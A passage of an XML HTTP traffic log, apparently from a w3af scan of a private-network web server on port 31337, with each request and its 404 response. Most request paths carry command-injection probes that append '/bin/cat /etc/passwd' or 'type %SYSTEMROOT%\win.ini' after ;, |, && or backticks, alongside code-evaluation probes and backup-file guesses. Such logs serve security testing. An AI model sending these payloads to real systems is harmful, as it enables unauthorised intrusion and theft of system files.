                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="249">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.116.gzip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.116.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="250">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.116.7z HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.116.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="251">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/print+%27rkdxj%27x5 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="252">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.116.cab HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.116.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="253">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/print+%27rkdxj%27%2A5 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="254">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/Response.Write%28new+String%28%22rkdxj%22%2C5%29%29 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="584" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Response.Write%28new+String%28%22rkdxj%22%2C5%29%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="256">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="257">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="258">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="564" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="259">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%26%26/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="260">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="261">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%26%26type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="570" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%26%26type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="262">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%7C%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="267">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%7C/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="268">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="269">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%3B%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="270">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/run+type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="568" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/run+type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="271">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%3B/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="272">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%3Btype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%3Btype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="273">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%60/bin/cat+/etc/passwd%60 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
